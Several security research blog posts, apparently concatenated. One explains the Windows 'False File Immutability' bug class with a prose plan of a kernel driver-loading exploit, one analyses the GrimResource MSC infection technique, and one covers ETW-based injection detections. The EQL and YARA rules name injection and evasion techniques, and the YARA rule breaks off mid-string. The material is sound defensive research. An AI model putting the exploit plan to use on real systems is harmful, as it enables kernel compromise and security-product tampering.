In addition to traditional read/write file operations, Windows lets applications map files into memory. Before we go deeper, it’s important to understand that section objects are kernel parlance for file mappings; they are the same thing. This article focuses on the kernel, so it will primarily refer to them as section objects.

There are two types of section objects - data sections and executable image sections. Data sections are direct 1:1 mappings of files into memory. The file’s contents will appear in memory exactly as they do on disk. Data sections also have uniform memory permissions for the entire memory range. With respect to the underlying file, data sections can be either read-only or read-write. A read-write view of a file enables a process to read or write the file’s contents by reading/writing memory within its own address space.

Executable image sections (sometimes abbreviated to image sections) prepare PE files to be executed. Image sections must be created from PE files. Examples of PE files include EXE, DLL, SYS, CPL, SCR, and OCX files. The kernel processes the PEs specially to prepare them to be executed. Different PE regions will be mapped in memory with different page permissions, depending on their metadata. Image views are copy-on-write, meaning any changes in memory will be saved to the process’s private working set — never written to the backing PE.

Let’s say application A wants to map a file into memory with a data section. First, it opens that file with an API such as ZwCreateFile, which returns a file handle. Next, it passes this file handle to an API such as ZwCreateSection which creates a section object that describes how the file will be mapped into memory; this yields a section handle. The process then uses the section handle to map a “view” of that section into the process address space, completing the memory mapping.

Once the file is successfully mapped, process A can close both the file and section handles, leaving zero open handles to the file. If process B later wants to use the file without the risk of it being modified externally, it would omit FILE_SHARE_WRITE when opening the file. IoCheckLinkShareAccess looks for open file handles, but since the handles were previously closed, it will not fail the operation.

This creates a problem for file sharing. Process B thinks it has a file open without risk of external modification, but process A can modify it through the memory mapping. To account for this, the filesystem must also call MmDoesFileHaveUserWritableReferences. This checks whether there are any active writable file mappings to the given file. We can see this check in the FastFAT example here:

//
//  Do an extra test for writeable user sections if the user did not allow
//  write sharing - this is neccessary since a section may exist with no handles
//  open to the file its based against.
//

if ((NodeType( FcbOrDcb ) == FAT_NTC_FCB) &&
    !FlagOn( ShareAccess, FILE_SHARE_WRITE ) &&
    FlagOn( *DesiredAccess, FILE_EXECUTE | FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | DELETE | MAXIMUM_ALLOWED ) &&
    MmDoesFileHaveUserWritableReferences( &FcbOrDcb->NonPaged->SectionObjectPointers )) {

    return STATUS_SHARING_VIOLATION;
}

Windows requires PE files to be immutable (unmodifiable) while they are running. This prevents EXEs and DLLs from being changed on disk while they are running in memory. Filesystem drivers must use the MmFlushImageSection function to check whether there are any active image mappings of a PE before allowing FILE_WRITE_DATA access. We can see this in the FastFAT example code, and on Microsoft Learn.

//
//  If the user wants write access access to the file make sure there
//  is not a process mapping this file as an image. Any attempt to
//  delete the file will be stopped in fileinfo.c
//
//  If the user wants to delete on close, we must check at this
//  point though.
//

if (FlagOn(*DesiredAccess, FILE_WRITE_DATA) || DeleteOnClose) {

    Fcb->OpenCount += 1;
    DecrementFcbOpenCount = TRUE;

    if (!MmFlushImageSection( &Fcb->NonPaged->SectionObjectPointers,
                              MmFlushForWrite )) {

        Iosb.Status = DeleteOnClose ? STATUS_CANNOT_DELETE :
                                      STATUS_SHARING_VIOLATION;
        try_return( Iosb );
    }
}

Another way to think of this check is that ZwMapViewOfSection(SEC_IMAGE) implies no-write-sharing as long as the view exists.

Authenticode

The Windows Authenticode Specification describes a way to employ cryptography to “sign” PE files. A “digital signature” cryptographically attests that the PE was produced by a particular entity. Digital signatures are tamper-evident, meaning that any material modification of signed files should be detectable because the digital signature will no longer match. Digital signatures are typically appended to the end of PE files.

Authenticode can’t apply traditional hashing (e.g. sha256sum) in this case, because the act of appending the signature would change the file’s hash, breaking the signature it just generated. Instead, the Authenticode specification describes an algorithm to skip specific portions of the PE file that will be changed during the signing process. This algorithm is called authentihash. You can use authentihash with any hashing algorithm, such as SHA256. When a PE file is digitally signed, the file’s authentihash is what’s actually signed.

Code integrity

Windows has a few different ways to validate Authenticode signatures. User mode applications can call WinVerifyTrust to validate a file’s signature in user mode. The Code Integrity (CI) subsystem, residing in ci.dll, validates signatures in the kernel. If Hypervisor-Protected Code Integrity is running, the Secure Kernel employs skci.dll to validate Authenticode. This article will focus on Code Integrity (ci.dll) in the regular kernel.

Code Integrity provides both Kernel Mode Code Integrity and User Mode Code Integrity, each serving a different set of functions.

Kernel Mode Code Integrity (KMCI):

Enforces Driver Signing Enforcement and the Vulnerable Driver Blocklist

User Mode Code Integrity (UMCI):

CI validates the signatures of EXEs and DLLs before allowing them to load
Enforces Protected Processes and Protected Process Light signature requirements
Enforces ProcessSignaturePolicy mitigation (SetProcessMitigationPolicy)
Enforces INTEGRITYCHECK for FIPS 140-2 modules.
Exposed to consumers as Smart App Control
Exposed to businesses as App Control for Business (formerly WDAC)

KMCI and UMCI implement different policies for different scenarios. For example, the policy for Protected Processes is different from that of INTEGRITYCHECK.

Incorrect assumptions

Microsoft documentation implies that files successfully opened without write sharing can’t be modified by another user or process.

FILE_SHARE_WRITE
0x00000002
Enables subsequent open operations on a file or device to request write access. Otherwise, other processes cannot open the file or device if they request write access.

If this flag is not specified, but the file or device has been opened for write access or has a file mapping with write access, the function fails.

Above, we discussed how sharing is enforced by the filesystem, but what if the filesystem doesn’t know that the file’s been modified?

Like most user mode memory, the Memory Manager (MM) in the kernel may page-out portions of file mappings when it deems necessary, such as when the system needs more free physical memory. Both data and executable image mappings may be paged-out. Executable image sections can never modify the backing file, so they’re effectively treated as read-only with respect to the backing PE file. As mentioned before, image sections are copy-on-write, meaning any in-memory changes immediately create a private copy of the given page.

When the memory manager needs to page-out a page from an image section, it can use the following decision tree:

Never modified? Discard it. We can read the contents back from the immutable file on disk.
Modified? Save private copy it to the pagefile.
- Example: If a security product hooks a function in ntdll.dll, MM will create a private copy of each modified page. Upon page-out, private pages will be written to the pagefile.

If those paged-out pages are later touched, the CPU will issue a page fault and the MM will restore the pages.

Page never modified? Read the original contents back from the immutable file on disk.
Page private? Read it from the pagefile.

Note the following exception: The memory manager may treat PE-relocated pages as unmodified, dynamically reapplying relocations during page faults.

Page hashes

Page hashes are a list of hashes of each 4KB page within a PE file. Since pages are 4KB, page faults typically occur on 4KB of data at a time. Full Authenticode verification requires the entire contiguous PE file, which isn’t available during a page fault. Page hashes allow the MM to validate hashes of individual pages during page faults.

There are two types of page hashes, which we’ve coined static and dynamic. Static page hashes are stored within a PE’s digital signature if the developer passes /ph to signtool. By pre-computing these, they are immediately available to the MM and CI upon module load.

CI can also compute them on-the-fly during signature validation, a mechanism we’re calling dynamic page hashes. Dynamic page hashes give CI flexibility to enforce page hashes even for files that were never signed with them.

Page hashes are not free - they use CPU and slow down page faults. They’re not used in most cases.

Attacking code integrity

Imagine a scenario where a ransomware operator wants to ransom a hospital, so they send a phishing email to a hospital employee. The employee opens the email attachment and enables macros, running the ransomware. The ransomware employs a UAC bypass to immediately elevate to admin, then attempts to terminate any security software on the system so it can operate unhindered. Anti-Malware services run as Protected Process Light (PPL), protecting them from tampering by malware with admin rights, so the ransomware can’t terminate the Anti-Malware service.

If the ransomware could also run as a PPL, it could terminate the Anti-Malware product. The ransomware can’t launch itself directly as a PPL because UMCI prevents improperly-signed EXEs and DLLs from loading into PPL, as we discussed above. The ransomware might try to inject code into a PPL by modifying an EXE or DLL that’s already running, but the aforementioned MmFlushImageSection ensures in-use PE files remain immutable, so this isn’t possible.

We previously discussed how the filesystem is responsible for sharing checks. What would happen if an attacker were to move the filesystem to another machine?

Network redirectors allow the use of network paths with any API that accepts file paths. This is very convenient, allowing users and applications to easily open and memory-map files over the network. Any resulting I/O is transparently redirected to the remote machine. If a program is launched from a network drive, the executable images for the EXE and its DLLs will be transparently pulled from the network.

When a network redirector is in use, the server on the other end of the pipe needn’t be a Windows machine. It could be a Linux machine running Samba, or even a python impacket script that “speaks” the SMB network protocol. This means the server doesn’t have to honor Windows filesystem sharing semantics.

An attacker can employ a network redirector to modify a PPL’s DLL server-side, bypassing sharing restrictions. This means that PEs backing an executable image section are incorrectly assumed to be immutable. This is a class of vulnerability that we are calling False File Immutability (FFI).

Paging exploitation

If an attacker successfully exploits False File Immutability to inject code into an in-use PE, wouldn’t page hashes catch such an attack? The answer is: sometimes. If we look at the following table, we can see that page hashes are enforced for kernel drivers and Protected Processes, but not for PPL, so let’s pretend we’re an attacker targeting PPL.

	Authenticode	Page hashes
Kernel drivers	✅	✅
Protected Processes (PP-Full)	✅	✅
Protected Process Light (PPL)	✅	❌

Last year at Black Hat Asia 2023 (abstract, slides, recording), we disclosed a vulnerability in the Windows kernel, showing how bad assumptions in paging can be exploited to inject code into PPL, defeating security features like LSA & Anti-Malware Process Protection. The attack leveraged False File Immutability assumptions for DLLs in PPLs, as we just described, though we hadn’t yet named the vulnerability class.

Alongside the presentation, we released the PPLFault exploit which demonstrates the vulnerability by dumping the memory of an otherwise-protected PPL. We also released the GodFault exploit chain, which combines the PPLFault Admin-to-PPL exploit with the AngryOrchard PPL-to-kernel exploit to achieve full read/write control of physical memory from user mode. We did this to motivate Microsoft to take action on a vulnerability that MSRC declined to fix because it did not meet their servicing criteria. Thankfully, the Windows Defender team at Microsoft stepped up, releasing a fix in February 2024 that enforces dynamic page hashes for executable images loaded over network redirectors, breaking PPLFault.

New research

Above, we discussed Authenticode signatures embedded within PE files. In addition to embedded signatures, Windows supports a form of detached signature called a security catalog. Security catalogs (.cat files) are essentially a list of signed authentihashes. Every PE with an authentihash in that list is considered to be signed by that signer. Windows keeps a large collection of catalog files in C:\Windows\System32\CatRoot which CI loads, validates, and caches.

A typical Windows system has over a thousand catalog files, many containing dozens or hundreds of authentihashes.

To use a security catalog, Code Integrity must first load it. This occurs in a few discrete steps. First, CI maps the file into kernel memory using ZwOpenFile, ZwCreateSection, and ZwMapViewOfSection. Once mapped, it validates the catalog’s digital signature using CI!MinCrypK_VerifySignedDataKModeEx. If the signature is valid, it parses the hashes with CI!I_MapFileHashes.

Breaking this down, we see a few key insights. First, ZwCreateSection(SEC_COMMIT) tells us that CI is creating a data section, not an image section. This is important because there is no concept of page hashes for data sections.

Next, the file is opened without FILE_SHARE_WRITE, meaning write sharing is denied. This is intended to prevent modification of the security catalog during processing. However, as we have shown above, this is a bad assumption and another example of False File Immutability. It should be possible, in theory, to perform a PPLFault-style attack on security catalog processing.

Planning the attack

The general flow of the attack is as follows:

The attacker will plant a security catalog on a storage device that they control. They will install a symbolic link to this catalog in the CatRoot directory, so Windows knows where to find it.
The attacker asks the kernel to load a malicious unsigned kernel driver.
Code Integrity attempts to validate the driver, but it can’t find a signature or trusted authentihash, so it re-scans the CatRoot directory and finds the attacker’s new catalog.
CI maps the catalog into kernel memory and validates its signature. This generates page faults which are sent to the attacker’s storage device. The storage device returns a legitimate Microsoft-signed catalog.
The attacker empties the system working set, forcing all the previously-fetched catalog pages to be discarded.
CI begins parsing the catalog, generating new page faults. This time, the storage device injects the authentihash of their malicious driver.
CI finds the malicious driver’s authentihash in the catalog and loads the driver. At this point, the attacker has achieved arbitrary code execution in the kernel.

Implementation and considerations

The plan is to use a PPLFault-style attack, but there are some important differences in this situation. PPLFault used an opportunistic lock (oplock) to deterministically freeze the victim process’s initialization. This gave the attacker time to switch over to the payload and flush the system working set. Unfortunately, we couldn’t find any good opportunities for oplocks here. Instead, we’re going to pursue a probabilistic approach: rapidly toggling the security catalog between the malicious and benign versions.

The verification step touches every page of the catalog, which means all of those pages will be resident in memory when parsing begins. If the attacker changes the catalog on their storage device, it won’t be reflected in memory until after a subsequent page fault. To evict these pages from kernel memory, the attacker must empty the working set between MinCrypK_VerifySignedDataKModeEx and I_MapFileHashes.

This approach is inherently a race condition. There’s no built-in delays between signature verification and catalog parsing - it’s a tight race. We’ll need to employ several techniques to widen our window of opportunity.

Most security catalogs on the system are small, a few kilobytes. By choosing a large 4MB catalog, we can greatly increase the amount of time that CI spends parsing. Assuming catalog parsing is linear, we can choose an authentihash near the end of the catalog to maximize the time between signature verification and when CI reaches our tampered page. Further, we will create threads for each CPU on the system whose sole purpose is to consume CPU cycles. These threads run at higher priority than CI, so CI will be starved of CPU time. There will be one thread dedicated to repeatedly flushing pages from the system’s working set, and one thread repeatedly attempting to load the unsigned driver.

This attack has two main failure modes. First, if the payload Authentihash is read during the signature check, then the signature will be invalid and the catalog will be rejected.

Next, if an even number of toggles occur (including zero) between signature validation and parsing, then CI will parse the benign hash and reject our driver.

The attacker wins if CI validates a benign catalog then parses a malicious one.

Exploit demo

We named the exploit ItsNotASecurityBoundary as an homage to MSRC's policy that "Administrator-to-kernel is not a security boundary.” The code is in GitHub here.

Demo video here.

Understanding these vulnerabilities

In order to properly defend against these vulnerabilities, we first need to understand them better.

A double-read (aka double-fetch) vulnerability can occur when victim code reads the same value out of an attacker-controlled buffer more than once. The attacker may change the value of this buffer between the reads, resulting in unexpected victim behavior.

Imagine there is a page of memory shared between two processes for an IPC mechanism. The client and server send data back and forth using the following struct. To send an IPC request, a client first writes a request struct into the shared memory page, then signals an event to notify the server of a pending request.

struct IPC_PACKET
{
    SIZE_T length;
    UCHAR data[];
};

A double-read attack could look something like this:

First, the attacking client sets a packet’s structure’s length field to 16 bytes, then signals the server to indicate that a packet is ready for processing. The victim server wakes up and allocates a 16-byte buffer using malloc(pPacket->length). Immediately afterwards, the attacker changes the length field to 32. Next, the victim server attempts to copy the packet’s contents into the the new buffer by calling memcpy(pBuffer, pPacket->data, pPacket->length), re-reading the value in pPacket->length, which is now 32. The victim ends up copying 32 bytes into a 16-byte buffer, overflowing it.

Double-read vulnerabilities frequently apply to shared-memory scenarios. They commonly occur in drivers that operate on user-writable buffers. Due to False File Immutability, developers need to be aware that their scope is actually much wider, and includes all files writable by attackers. Denying write sharing does not necessarily prevent file modification.

Affected Operations

What types of operations are affected by False File Immutability?

Operation	API	Mitigations
Image Sections	CreateProcess LoadLibrary	1. Enable Page Hashes
Data Sections	MapViewOfFile ZwMapViewOfSection	1. Avoid double reads\ 2. Copy the file to a heap buffer before processing\ 3. Prevent paging via MmProbeAndLockPages/VirtualLock
Regular I/O	ReadFile ZwReadFile	1. Avoid double reads\ 2. Copy the file to a heap buffer before processing

What else could be vulnerable?

Looking for potentially-vulnerable calls to ZwMapViewOfSection in the NT kernel yields quite a few interesting functions:

If we expand our search to regular file I/O, we find even more candidates. An important caveat, however, is that ZwReadFile may be used for more than just files. Only uses on files (or those which could be coerced into operating on files) could be vulnerable.

Looking outside of the NT kernel, we can find other drivers to investigate:

Don’t forget about user mode

We’ve mostly been discussing the kernel up to this point, but it’s important to note that any user mode application that calls ReadFile, MapViewOfFile, or LoadLibrary on an attacker-controllable file, denying write sharing for immutability, may be vulnerable. Here’s a few hypothetical examples.

MapViewOfFile

Imagine an application that is split into two components - a low-privileged worker process with network access, and a privileged service that installs updates. The worker downloads updates and stages them to a specific folder. When the privileged service sees a new update staged, it first validates the signature before installing the update. An attacker could abuse FFI to modify the update after the signature check.

ReadFile

Since files are subject to double-read vulnerabilities, anything that parses complex file formats may be vulnerable, including antivirus engines and search indexers.

LoadLibrary

Some applications rely on UMCI to prevent attackers from loading malicious DLLs into their processes. As we’ve shown with PPLFault, FFI can defeat UMCI.

Stopping the exploit

Per their official servicing guidelines, MSRC won’t service Admin -> Kernel vulnerabilities by default. In this parlance, servicing means “fix via security update.” This type of vulnerability, however, allows malware to bypass AV Process Protections, leaving AV and EDR vulnerable to instant-kill attacks.

As a third-party, we can’t patch Code Integrity, so what can we do to protect our customers? To mitigate ItsNotASecurityBoundary, we created FineButWeCanStillEasilyStopIt, a filesystem minifilter driver that prevents Code Integrity from opening security catalogs over network redirectors. You can find it on GitHub here.

FineButWeCanStillEasilyStopIt has to jump through some hoops to correctly identify the problematic behavior while minimizing false positives. Ideally, CI itself could be fixed with a few small changes. Let’s look at what that would take.

As mentioned above in the Affected Operations section, applications can mitigate double-read vulnerabilities by copying the file contents out of the file mapping into the heap, and exclusively using that heap copy for all subsequent operations. The kernel heap is called the pool, and the corresponding allocation function is ExAllocatePool.

An alternative mitigation strategy to break these types of exploits is to pin the pages of the file mapping into physical memory using an API such as MmProbeAndLockPages. This prevents eviction of those pages when the attacker empties the working set.

End-user detection and mitigation

Fortunately, there is a way for end-users to mitigate this exploit without changes from Microsoft – Hypervisor Protected Code Integrity (HVCI). If HVCI is enabled, CI.dll doesn’t do catalog parsing at all. Instead, it sends the catalog contents to the Secure Kernel, which runs in a separate virtual machine on the same host. The Secure Kernel stores the received catalog contents in its own heap, from which signature validation and parsing are performed. Just like with the ExAllocatePool mitigation described above, the exploit is mitigated because file changes have no effect on the heap copy.

The probabilistic nature of this attack means that there are likely many failed attempts. Windows records these failures in the Microsoft-Windows-CodeIntegrity/Operational event log. Users can check this log for evidence of exploitation.

Disclosure

The disclosure timeline is as follows:

2024-02-14: We reported ItsNotASecurityBoundary and FineButWeCanStillEasilyStopIt to MSRC as VULN-119340, suggesting ExAllocatePool and MmProbeAndLockPages as simple low-risk fixes
2024-02-29: The Windows Defender team reached out to coordinate disclosure
2024-04-23: Microsoft releases KB5036980 Preview with the MmProbeAndLockPages fix
2024-05-14: Fix reaches GA for Windows 11 23H2 as KB5037771; we have not tested any other platforms (Win10, Server, etc).
2024-06-14: MSRC closed the case, stating "We have completed our investigation and determined that the case doesn't meet our bar for servicing at this time. As a result, we have opened a next-version candidate bug for the issue, and it will be evaluated for upcoming releases. Thanks, again, for sharing this report with us."

Fixing Code Integrity

Looking at the original implementation of CI!I_MapAndSizeDataFile, we can see the legacy code calling ZwCreateSection and ZwMapViewOfSection:

Contrast that with the new CI!CipMapAndSizeDataFileWithMDL, which follows that up with MmProbeAndLockPages:

Summary and conclusion

Today we discussed and named a bug class: False File Immutability. We are aware of two public exploits that leverage it, PPLFault and ItsNotASecurityBoundary.

PPLFault: Admin -> PPL [-> Kernel via GodFault]

Exploits bad immutability assumptions about image section in CI/MM
Reported September 2022
Patched February 2024 (~510 days later)

ItsNotASecurityBoundary: Admin -> Kernel

Exploits bad immutability assumptions about data sections in CI
Reported February 2024
Patched May 2024 (~90 days later)

If you are writing Windows code that operates on files, you need to be aware of the fact these files may be modified while you are working on them, even if you deny write sharing. See the Affected Operations section above for guidance on how to protect yourselves and your customers against these types of attacks.

ItsNotASecurityBoundary is not the end of FFI. There are other exploitable FFI vulnerabilities out there. My colleagues and I at Elastic Security Labs will continue exploring and reporting on FFI and beyond. We encourage you to follow along on X @GabrielLandau and @ElasticSecLabs.

GrimResource - Microsoft Management Console for initial access and evasion

Sat, 22 Jun 2024 00:00:00 GMT

Overview

After Microsoft disabled office macros by default for internet-sourced documents, other infection vectors like JavaScript, MSI files, LNK objects, and ISOs have surged in popularity. However, these other techniques are scrutinized by defenders and have a high likelihood of detection. Mature attackers seek to leverage new and undisclosed infection vectors to gain access while evading defenses. A recent example involved DPRK actors using a new command execution technique in MSC files.

Elastic researchers have uncovered a new infection technique also leveraging MSC files, which we refer to as GrimResource. It allows attackers to gain full code execution in the context of mmc.exe after a user clicks on a specially crafted MSC file. A sample leveraging GrimResource was first uploaded to VirusTotal on June 6th.

Key takeaways

Elastic Security researchers uncovered a novel, in-the-wild code execution technique leveraging specially crafted MSC files referred to as GrimResource
GrimResource allows attackers to execute arbitrary code in Microsoft Management Console (mmc.exe) with minimal security warnings, ideal for gaining initial access and evading defenses
Elastic is providing analysis of the technique and detection guidance so the community can protect themselves

Analysis

The key to the GrimResource technique is using an old XSS flaw present in the apds.dll library. By adding a reference to the vulnerable APDS resource in the appropriate StringTable section of a crafted MSC file, attackers can execute arbitrary javascript in the context of mmc.exe. Attackers can combine this technique with DotNetToJScript to gain arbitrary code execution.

At the time of writing, the sample identified in the wild had 0 static detections in VirusTotal.

The sample begins with a transformNode obfuscation technique, which was observed in recent but unrelated macro samples. This aids in evading ActiveX security warnings.

This leads to an obfuscated embedded VBScript, as reconstructed below:

The VBScript sets the target payload in a series of environment variables and then leverages the DotNetToJs technique to execute an embedded .NET loader. We named this component PASTALOADER and may release additional analysis on this specific tool in the future.

PASTALOADER retrieves the payload from environment variables set by the VBScript in the previous step:

Finally, PASTALOADER spawns a new instance of dllhost.exe and injects the payload into it. This is done in a deliberately stealthy manner using the DirtyCLR technique, function unhooking, and indirect syscalls. In this sample, the final payload is Cobalt Strike.

Detections

In this section, we will examine current behavior detections for this sample and present new, more precise ones aimed at the technique primitives.

Suspicious Execution via Microsoft Common Console

This detection was established prior to our discovery of this new execution technique. It was originally designed to identify a different method (which requires the user to click on the Taskpad after opening the MSC file) that exploits the same MSC file type to execute commands through the Console Taskpads command line attribute:

process where event.action == "start" and
 process.parent.executable : "?:\\Windows\\System32\\mmc.exe" and  process.parent.args : "*.msc" and
 not process.parent.args : ("?:\\Windows\\System32\\*.msc", "?:\\Windows\\SysWOW64\\*.msc", "?:\\Program files\\*.msc", "?:\\Program Files (x86)\\*.msc") and
 not process.executable :
              ("?:\\Windows\\System32\\mmc.exe",
               "?:\\Windows\\System32\\wermgr.exe",
               "?:\\Windows\\System32\\WerFault.exe",
               "?:\\Windows\\SysWOW64\\mmc.exe",
               "?:\\Program Files\\*.exe",
               "?:\\Program Files (x86)\\*.exe",
               "?:\\Windows\\System32\\spool\\drivers\\x64\\3\\*.EXE",
               "?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe")

It triggers here because this sample opted to spawn and inject a sacrificial instance of dllhost.exe:

.NET COM object created in non-standard Windows Script Interpreter

The sample is using the DotNetToJScript technique, which triggers another detection looking for RWX memory allocation from .NET on behalf of a Windows Script Host (WSH) script engine (Jscript or Vbscript):

The following EQL rule will detect execution via the .NET loader:

api where
  not process.name : ("cscript.exe", "wscript.exe") and
  process.code_signature.trusted == true and
  process.code_signature.subject_name : "Microsoft*" and
  process.Ext.api.name == "VirtualAlloc" and
  process.Ext.api.parameters.allocation_type == "RESERVE" and 
  process.Ext.api.parameters.protection == "RWX" and
  process.thread.Ext.call_stack_summary : (
    /* .NET is allocating executable memory on behalf of a WSH script engine
     * Note - this covers both .NET 2 and .NET 4 framework variants */
    "*|mscoree.dll|combase.dll|jscript.dll|*",
    "*|mscoree.dll|combase.dll|vbscript.dll|*",
    "*|mscoree.dll|combase.dll|jscript9.dll|*",
    "*|mscoree.dll|combase.dll|chakra.dll|*"
)

The following alert shows mmc.exe allocating RWX memory and the process.thread.Ext.call_stack_summary captures the origin of the allocation from vbscript.dll to clr.dll :

Script Execution via MMC Console File

The two previous detections were triggered by specific implementation choices to weaponize the GrimResource method (DotNetToJS and spawning a child process). These detections can be bypassed by using more OPSEC-safe alternatives.

Other behaviors that might initially seem suspicious — such as mmc.exe loading jscript.dll, vbscript.dll, and msxml3.dll — can be clarified compared to benign data. We can see that, except for vbscript.dll, these WSH engines are typically loaded by mmc.exe:

The core aspect of this method involves using apds.dll to execute Jscript via XSS. This behavior is evident in the mmc.exe Procmon output as a CreateFile operation (apds.dll is not loaded as a library):

We added the following detection using Elastic Defend file open events where the target file is apds.dll and the process.name is mmc.exe:

The following EQL rule will detect the execution of a script from the MMC console:

sequence by process.entity_id with maxspan=1m
 [process where event.action == "start" and
  process.executable : "?:\\Windows\\System32\\mmc.exe" and process.args : "*.msc"]
 [file where event.action == "open" and file.path : "?:\\Windows\\System32\\apds.dll"]

Windows Script Execution via MMC Console File

Another detection and forensic artifact is the creation of a temporary HTML file in the INetCache folder, named redirect[*] as a result of the APDS XSS redirection:

The following EQL correlation can be used to detect this behavior while also capturing the msc file path:

sequence by process.entity_id with maxspan=1m
 [process where event.action == "start" and
  process.executable : "?:\\Windows\\System32\\mmc.exe" and process.args : "*.msc"]
 [file where event.action in ("creation", "overwrite") and
  process.executable :  "?:\\Windows\\System32\\mmc.exe" and file.name : "redirect[?]" and 
  file.path : "?:\\Users\\*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\*\\redirect[?]"]

Alongside the provided behavior rules, the following YARA rule can be used to detect similar files:

rule Windows_GrimResource_MMC {
    meta:
        author = "Elastic Security"
        reference = "https://www.elastic.co/kr/security-labs/GrimResource"
        reference_sample = "14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb"
        arch_context = "x86"
        scan_context = "file, memory"
        license = "Elastic License v2"
        os = "windows"
    strings:
        $xml = "


Conclusion
Attackers have developed a new technique to execute arbitrary code in Microsoft Management Console using crafted MSC files. Elastic’s existing out of the box coverage shows our defense-in-depth approach is effective even against novel threats like this. Defenders should leverage our detection guidance to protect themselves and their customers from this technique before it proliferates into commodity threat groups.
Observables
All observables are also available for download in both ECS and STIX formats.
The following observables were discussed in this research.



Observable
Type
Name
Reference




14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb
SHA-256
sccm-updater.msc
Abused MSC file


4cb575bc114d39f8f1e66d6e7c453987639289a28cd83a7d802744cd99087fd7
SHA-256
N/A
PASTALOADER


c1bba723f79282dceed4b8c40123c72a5dfcf4e3ff7dd48db8cb6c8772b60b88
SHA-256
N/A
Cobalt Strike payload

Observable	Type	Name	Reference
`14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb`	SHA-256	`sccm-updater.msc`	Abused MSC file
`4cb575bc114d39f8f1e66d6e7c453987639289a28cd83a7d802744cd99087fd7`	SHA-256	N/A	PASTALOADER
`c1bba723f79282dceed4b8c40123c72a5dfcf4e3ff7dd48db8cb6c8772b60b88`	SHA-256	N/A	Cobalt Strike payload



Doubling Down: Detecting In-Memory Threats with Kernel ETW Call Stacks
Tue, 09 Jan 2024 00:00:00 GMT
Introduction
We were pleased to see that the kernel call stack capability we released in 8.8 was met with extremely positive community feedback - both from the offensive research teams attempting to evade us and the defensive teams triaging alerts faster due to the additional context.
But this was only the first step: We needed to arm defenders with even more visibility from the kernel - the most reliable mechanism to combat user-mode threats. With the introduction of Kernel Patch Protection in x64 Windows, Microsoft created a shared responsibility model where security vendors are now limited to only the kernel visibility and extension points that Microsoft provides. The most notable addition to this visibility is the Microsoft-Windows-Threat-Intelligence Event Tracing for Windows(ETW) provider.
Microsoft has identified a handful of highly security-relevant syscalls and provided security vendors with near real-time telemetry of those. While we would strongly prefer inline callbacks that allow synchronous blocking of malicious activity, Microsoft has implicitly not deemed this a necessary security use case yet. Currently, the only filtering mechanism afforded to security vendors for these syscalls is user-mode hooking - and that approach is inherently fragile. At Elastic, we determined that a more robust detection approach based on kernel telemetry collected through ETW would provide greater security benefits than easily bypassed user-mode hooks. That said, kernel ETW does have some systemic issues that we have logged with Microsoft, along with suggested mitigations.
Implementation
Endpoint telemetry is a careful balance between completeness and cost. Vendors don’t want to balloon your SIEM storage costs unnecessarily, but they also don't want you to miss the critical indicator of compromise. To reduce event volumes for these new API events, we fingerprint each event and only emit it if it is unique. This deduplication ensures a minimal impact on detection fidelity.
However, this approach proved insufficient in reducing API event volumes to manageable levels in all environments. Any further global reduction of event volumes we introduced would be a blindspot for our customers. Instead of potentially impairing detection visibility in this fashion, we determined that these highly verbose events would be processed for detections on the host but would not be streamed to the SIEM by default. This approach reduces storage costs for most of our users while also empowering any customer SOCs that want the full fidelity of those events to opt into streaming via an advanced option available in Endpoint policy and implement filtering tailored to their specific environments.
Currently, we propagate visibility into the following APIs -

VirtualAlloc
VirtualProtect
MapViewOfFile
VirtualAllocEx
VirtualProtectEx
MapViewOfFile2
QueueUserAPC [call stacks not always available due to ETW limitations]
SetThreadContext [call stacks planned for 8.12]
WriteProcessMemory
ReadProcessMemory (lsass) [planned for 8.12]

In addition to call stack information, our API events are also enriched with several behaviors:



API event
Description




cross-process
The observed activity was between two processes.


native_api
A call was made directly to the undocumented Native API rather than the supported Win32 API.


direct_syscall
A syscall instruction originated outside of the Native API layer.


proxy_call
The call stack appears to show a proxied API call to masking the true caller.


sensitive_api
Executable non-image memory is unexpectedly calling a sensitive API.


shellcode
Suspicious executable non-image memory is calling a sensitive API.


image-hooked
An entry in the call stack appears to have been hooked.


image_indirect_call
An entry in the call stack was preceded by a call to a dynamically resolved function.


image_rop
An entry in the call stack was not preceded by a call instruction.


image_rwx
An entry in the call stack is writable.


unbacked_rwx
An entry in the call stack is non-image and writable.


allocate_shellcode
A region of non-image executable memory suspiciously allocated more executable memory.


execute_fluctuation
The PAGE_EXECUTE protection is unexpectedly fluctuating.


write_fluctuation
The PAGE_WRITE protection of executable memory is unexpectedly fluctuating.


hook_api
A change to the memory protection of a small executable image memory region was made.


hollow_image
A change to the memory protection of a large executable image memory region was made.


hook_unbacked
A change to the memory protection of a small executable non-image memory was made.


hollow_unbacked
A change to the memory protection of a large executable non-image memory was made.


guarded_code
Executable memory was unexpectedly marked as PAGE_GUARD.


hidden_code
Executable memory was unexpectedly marked as PAGE_NOACCESS.


execute_shellcode
A region of non-image executable memory was executed in an unexpected fashion.


hardware_breakpoint_set
A hardware breakpoint was potentially set.



New Rules
In 8.11, Elastic Defend’s behavior protection comes with many new rules against various popular malware techniques, such as shellcode fluctuation, threadless injection, direct syscalls, indirect calls, and AMSI or ETW patching.
These rules include:
Windows API Call via Direct Syscall
Identifies the call of commonly abused Windows APIs to perform code injection and where the call stack is not starting with NTDLL:
api where event.category == "intrusion_detection" and

    process.Ext.api.behaviors == "direct_syscall" and 

    process.Ext.api.name : ("VirtualAlloc*", "VirtualProtect*", 
                             "MapViewOfFile*", "WriteProcessMemory")


VirtualProtect via Random Indirect Syscall
Identifies calls to the VirtualProtect API and where the call stack is not originating from its equivalent NT syscall NtProtectVirtualMemory:
api where 

 process.Ext.api.name : "VirtualProtect*" and 

 not _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info: ("*ntdll.dll!NtProtectVirtualMemory*", "*ntdll.dll!ZwProtectVirtualMemory*")) 


Image Hollow from Unbacked Memory
api where process.Ext.api.behaviors == "hollow_image" and 

  process.Ext.api.name : "VirtualProtect*" and 

  process.Ext.api.summary : "*.dll*" and 

  process.Ext.api.parameters.size >= 10000 and process.executable != null and 

  process.thread.Ext.call_stack_summary : "*Unbacked*"

